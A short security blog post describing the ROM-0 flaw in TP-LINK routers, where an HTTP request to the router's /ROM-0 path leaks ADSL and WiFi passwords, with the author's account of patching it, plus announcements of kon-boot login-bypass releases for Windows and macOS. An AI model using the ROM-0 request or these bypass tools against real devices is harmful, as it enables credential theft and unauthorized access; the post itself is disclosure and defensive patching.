Recently a critical vulnerability has been found in TP-LINK routers and few other router devices. This particular vulnerability to which I am referring was described here. Basically it is so called ROM-0 attack. In short attacker by requesting ROM-0 through HTTP request (ie. http://192.168.1.1/ROM-0) can download all important and secret data stored in your router. This includes your ADSL login/password combination, WIFI password and basically all of your configuration data. Actually I was a bit pissed at TP-LINK for this crap so I have decided to patch the vulnerability by myself.

You can read the entire reversing journey here (blogger doesn't like assembly code :-)):
http://piotrbania.com/all/articles/tplink_patch/



In other news:

  • kon-boot v2.4 was released (now covers Windows 8/8.1 on-line account authorization bypass, so you can login into your box without knowing the password even if you have on-line MS account)
  • kon-boot for MAC OSX was updated to cover 10.9 Mavericks (both options available: password bypass and new root account)

Peace out!

http://blog.piotrbania.com/2014/01/hacking-and-patching-tp-link-td-w8901g.html